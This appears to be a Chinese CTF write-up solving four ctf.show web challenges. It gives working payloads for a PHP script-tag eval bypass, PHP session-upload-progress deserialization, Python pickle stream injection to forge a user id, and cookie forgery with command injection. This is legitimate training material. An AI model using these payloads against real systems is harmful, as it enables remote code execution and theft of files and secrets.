easy_eval
利用script标签绕过
code=<script language="php">system("cat /f*");</script>
不过只有php5可以用
剪刀石头布
考查session反序列化漏洞。
不同的session处理器会导致反序列化漏洞,具体的可以参考下这篇文章
https://www.jb51.net/article/107101.htm
题目中通过ini_set将session的处理器改为了php,而在phpinfo中可以看到默认的为
php_serialize
另外需要注意的点就是session.upload_progress_cleanup为off,也就是说我们通过session.upload_progess强制上传session文件,不会被清理掉,那么直接上传再来调用该session文件就可以触发反序列化了。
payload
import requests
url="http://cd46b01d-0aa7-4f0a-aa0e-8b3eced09e93.challenge.ctf.show/"
sess="yu22x"
data={'PHP_SESSION_UPLOAD_PROGRESS':'|O:4:"Game":1:{s:3:"log";s:22:"/var/www/html/flag.php";}'}
files={'file':'1'}
r = requests.post(url,data=data,files=files,cookies={'PHPSESSID':'yu22x'})
print(r.text)
baby_pickle
本地搭一下就很容易看出来了。
假设我们首先存入一个name为abc的用户,在对其进行更改时,可以看到本地打印出的数据
只要把这个地方改成0,然后访问/dacaiji?name=xxx即可得到flag
按照正常思路,做法如下
import requests
import base64
url="http://127.0.0.1:8888/"
requests.get(url+'?name=1')
requests.get(url+'change?name='+base64.b64encode(b'1').decode()+'&newname='+base64.b64encode(b"0").decode())
r = requests.get(url+'dacaiji?name=1')
print(r.text)
本地测试是可以成功的,但是要保证是第一次,要不然后面的id就不是1了。
不过在靶机上测试就没成功,所以只能用其他的方法了。
我们直接把name后面的都给改掉
b'ccopy_reg\n_reconstructor\n(c__main__\nRookie\nc__builtin__\nobject\nNtR(dVname\nVabc\nsVid\nI1\nsb.'
我们把上述内容中的abc替换成abc\nsVid\nI0\nsb.
那么最终的结果为
b'ccopy_reg\n_reconstructor\n(c__main__\nRookie\nc__builtin__\nobject\nNtR(dVname\nVabc\nsVid\nI0\nsb.'
成功把id污染成了0。
payload
import requests
import base64
url="http://0948181b-efd1-4377-b35d-9e465efc1a64.challenge.ctf.show/"
requests.get(url+'?name=abc')
requests.get(url+'change?name='+base64.b64encode(b'abc').decode()+'&newname='+base64.b64encode(b"abc\nsVid\nI0\nsb.").decode())
r = requests.get(url+'dacaiji?name=abc')
print(r.text)
repairman
来个非预期吧
可以看到其实没有覆盖掉$config['secret']
所以md5('admin'.$config['secret']):
是个固定值da53eb34c1bc6ce7bbfcedf200148106
直接改完cookie然后post传cmd就可以了
cmd=cat config.php >a.txt
预期解就是parse_str变量覆盖了
config[secret]=yu22x
cookie: secret=3601e2335c93b2404eab1319d0f4d4a3
cmd=cat config.php >a.txt